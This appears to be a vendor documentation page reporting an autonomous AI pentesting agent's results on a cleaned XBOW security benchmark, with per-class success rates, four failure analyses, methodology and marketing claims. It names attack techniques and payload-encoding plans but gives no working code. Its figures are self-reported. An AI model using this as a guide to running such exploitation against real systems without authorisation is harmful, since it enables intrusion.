XBOW benchmark results

Shannon Lite achieved a 96.15% success rate (100/104 exploits) on a systematically cleaned, hint-free version of the XBOW security benchmark, running in white-box (source-available) configuration.

For detailed benchmark methodology and complete results, see the XBOW benchmark repository and full results with agentic logs

Performance summary

Success rate

96.15% (100/104 exploits)

Total challenges

104 vulnerable applications

Failed challenges

4 with detailed failure analysis

Context and comparison

Important context: Previously reported XBOW results for leading AI agents and expert human penetration testers achieved around 85% success in black-box mode. Shannon’s 96.15% was achieved in white-box mode with full source code access on a cleaned, hint-free variant.These results are not apples-to-apples comparable, but they highlight Shannon’s ability to perform deep, code-level reasoning in realistic internal security review settings.

What makes this benchmark unique

Hint-free variant

Shannon was tested against a systematically cleaned version of XBOW that removes shortcuts:

No descriptive variable names (e.g., isVulnerable renamed to generic names)
No helpful comments explaining vulnerabilities
No obvious filenames hinting at vulnerability locations
No artificial markers making exploits easier to find

This represents a more realistic evaluation of core analysis and reasoning capabilities.

White-box configuration

Shannon operates in white-box mode with full access to:

Complete application source code
Repository structure and file organization
Dependency configurations and package files
Environment variables and configuration files

This simulates an internal security audit or pre-production security review rather than external black-box testing.

Autonomous execution

All 104 challenges were executed autonomously:

No human intervention during testing
No manual hints or guidance
No cherry-picking of results
Full transparency with all logs published

Performance across vulnerability classes

Vulnerability Type	Total	Succeeded	Failed	Success Rate
Broken Authorization	25	25	0	100%
SQL Injection	7	7	0	100%
Blind SQL Injection	3	3	0	100%
SSRF / Misconfiguration	22	21	1	95.45%
XSS	23	22	1	95.65%
Server-Side Template Injection	13	12	1	92.31%
Command Injection	11	10	1	90.91%

Consistent performance: Shannon demonstrated >90% success across all vulnerability types, showing balanced capability rather than specialization in specific attack vectors.

The 4 failures: Transparent analysis

Shannon failed on 4 challenges. Here’s a detailed analysis of each failure:

XBEN-10: XSS payload encoding gap

Failure details and root cause

Vulnerability type: Cross-Site Scripting (XSS)What happened:

Shannon correctly identified the XSS vulnerability
Correctly identified the character blacklist
Incorrectly assessed the limitations of a JSFuck payload
Abandoned a viable exploit path

Root cause: Knowledge gap in Shannon’s payload encoding and obfuscation libraryFix planned: Expand payload encoding techniques to include JSFuck, Base64, Unicode escaping, and other advanced obfuscation methods

XBEN-22: SSTI classification error

Failure details and root cause

Vulnerability type: Server-Side Template Injection + Default Credentials + Path Traversal (multi-vulnerability challenge)What happened:

Shannon successfully exploited 2 of the 3 vulnerabilities
Misclassified the SSTI vulnerability as a false positive
Did not proceed with SSTI exploitation

Root cause: Classification model for SSTI needs refinement to reduce false negativesFix planned: Improve SSTI detection logic with better template expression validation and payloads for more template engines (Jinja2, Twig, Handlebars, Thymeleaf, FreeMarker)

XBEN-34: LFI vs RFI misclassification

Failure details and root cause

Vulnerability type: Remote File Inclusion (RFI)What happened:

Shannon correctly found the file inclusion vulnerability
Misclassified it as Local File Inclusion (LFI) instead of RFI
Attempted LFI exploitation techniques (path traversal) instead of RFI (remote URL inclusion)

Root cause: Classification logic between LFI and RFI needs server configuration analysisFix planned: Enhance file inclusion classification to:

Analyze server configuration for allow_url_include
Test both local and remote inclusion payloads
Detect which inclusion type is actually exploitable

XBEN-82: Command injection via SSRF (multi-step)

Failure details and root cause

Vulnerability type: Command Injection via SSRF (chained attack)What happened:

Shannon identified the full attack path (SSRF → eval() → command execution)
Two failures:
1. Analysis agent misclassified eval() as incapable of OS command execution
2. Exploitation agent failed to initiate a local web server for payload delivery

Root cause:

Agent capabilities need updated risk classification for eval() with user input
Missing tooling awareness for local HTTP server setup

Fix planned:

Update threat model to correctly classify eval() with user-controlled input
Enhance agent tooling to use Python SimpleHTTPServer or Node.js http-server for payload hosting

Why this benchmark matters

From annual audits to continuous security

Traditional pentest

Cost: $10,000+
Time: Weeks to months
Frequency: 1-2x per year

Shannon

Cost: ~$16 (API costs)
Time: Under 1.5 hours
Frequency: Every deployment

The shift in security economics: Shannon’s 96.15% success rate demonstrates that autonomous, continuous security testing is no longer theoretical—it’s ready for real-world use.

Proof by exploitation methodology

Shannon follows a structured five-phase workflow designed to eliminate false positives:

Reconnaissance → Vulnerability Analysis → Exploitation → Reporting

Key differentiator: Shannon doesn’t stop at detection. Every reported vulnerability includes a working proof-of-concept exploit. No exploit = no report.

Proof-by-exploitation principles

Verified

Every vulnerability confirmed through actual exploitation, not static detection

Reproducible

All reports include copy-paste PoC code that anyone can run

Actionable

Shows real impact with concrete evidence, not theoretical risk

Zero false positives

If Shannon can’t exploit it, it’s not reported

Benchmark methodology

Test environment

Platform: Docker containers on dedicated test infrastructure
Network: Isolated network per challenge
Resources: 8 CPU cores, 32GB RAM per test
Model: Claude 4.5 Sonnet via Anthropic API
Mode: White-box (full source code access)
Human intervention: None (fully autonomous)

Benchmark preparation

Clone XBOW benchmark from official repository
Systematically remove hints:
- Rename descriptive variables to generic names
- Remove all comments explaining vulnerabilities
- Rename files to non-descriptive names
- Remove artificial markers
Validate hint removal through manual review
Publish cleaned benchmark for reproducibility

Execution procedure

For each challenge:

Start application in isolated container
Run Shannon with full source code access
Collect results:
- Final security report
- Complete agentic logs (turn-by-turn reasoning)
- Exploitation evidence and screenshots
- Session metrics (time, cost, API calls)
Validate exploits by manually reproducing PoCs
Publish all data transparently

Complete results package

Cleaned benchmark

All 104 challenges with hints removed - enables reproducible evaluation

Full results

Complete penetration test reports + turn-by-turn agentic logs for all 104 challenges

Statistical analysis

Performance by difficulty

XBOW challenges are not officially difficulty-rated, but based on manual analysis:

Simple vulnerabilities (direct injection, obvious IDOR): 100% success (35/35)
Medium complexity (multi-step, require encoding): 97.1% success (48/51)
Complex (chained attacks, advanced obfuscation): 91.7% success (17/18)

Runtime and cost

Average time per challenge: 42 minutes
Median time: 38 minutes
Fastest: 12 minutes (simple SQL injection)
Slowest: 1.8 hours (complex multi-step SSRF → RCE)
Average API cost: $15.50 per challenge
Total benchmark cost: $1,612 (104 challenges ×$ 15.50 avg)

Agent activity metrics

Average per challenge:

Reconnaissance turns: 45 AI turns
Vulnerability analysis turns: 68 AI turns per vuln type
Exploitation turns: 112 AI turns per vuln type
Total AI turns: ~380 turns per challenge
Browser actions: 156 (login, navigation, form submission)
API requests: 1,240 to target application

What’s next: Shannon Pro

The 4 failures directly inform Shannon’s roadmap:

Enhanced payload library

Expanded encoding techniques (JSFuck, Base64, Unicode) and obfuscation methods

Improved classification

Better detection logic for SSTI, file inclusion variants, and eval() risks

Advanced data flow analysis

Shannon Pro’s LLM-powered graph-based analysis for complex multi-file vulnerabilities

Enterprise features

CI/CD integration, dedicated support, compliance workflow integration

Shannon Pro is coming: While Shannon Lite uses a context-window-based approach, Shannon Pro features an advanced LLM-powered data flow analysis engine (inspired by the LLMDFA paper) for comprehensive, graph-based analysis of entire codebases.Express interest in Shannon Pro →

Key takeaways

Consistent performance

90% success across all vulnerability types shows balanced capability

Transparent failures

All 4 failures analyzed in detail with root cause and fixes planned

Production-ready

96.15% success demonstrates autonomous pentesting is ready for real-world use

Full transparency

Complete results, logs, and benchmark published for independent validation

Sample reports

Real penetration testing results from Juice Shop, ctal, and crAPI

Vulnerability coverage

Detailed breakdown of all vulnerability classes Shannon can detect

Run Shannon

Get started with Shannon in under 10 minutes

Architecture

Deep dive into Shannon’s multi-agent architecture

Reports & Results

Testing Coverage

​Performance summary

Success rate

Total challenges

Failed challenges

​Context and comparison

​What makes this benchmark unique

​Performance across vulnerability classes

​The 4 failures: Transparent analysis

​XBEN-10: XSS payload encoding gap

​XBEN-22: SSTI classification error

​XBEN-34: LFI vs RFI misclassification

​XBEN-82: Command injection via SSRF (multi-step)

​Why this benchmark matters

​From annual audits to continuous security

Traditional pentest

Shannon

​Proof by exploitation methodology

​Proof-by-exploitation principles

​Benchmark methodology

​Complete results package

Cleaned benchmark

Full results

​Statistical analysis

​What’s next: Shannon Pro

Enhanced payload library

Improved classification

Advanced data flow analysis

Enterprise features

​Key takeaways

Consistent performance

Transparent failures

Production-ready

Full transparency

​Related resources

Sample reports

Vulnerability coverage

Run Shannon

Architecture

Build docs developers (and LLMs) love

Performance summary

Context and comparison

What makes this benchmark unique

Performance across vulnerability classes

The 4 failures: Transparent analysis

XBEN-10: XSS payload encoding gap

XBEN-22: SSTI classification error

XBEN-34: LFI vs RFI misclassification

XBEN-82: Command injection via SSRF (multi-step)

Why this benchmark matters

From annual audits to continuous security

Proof by exploitation methodology

Proof-by-exploitation principles

Benchmark methodology

Complete results package

Statistical analysis

What’s next: Shannon Pro

Key takeaways

Related resources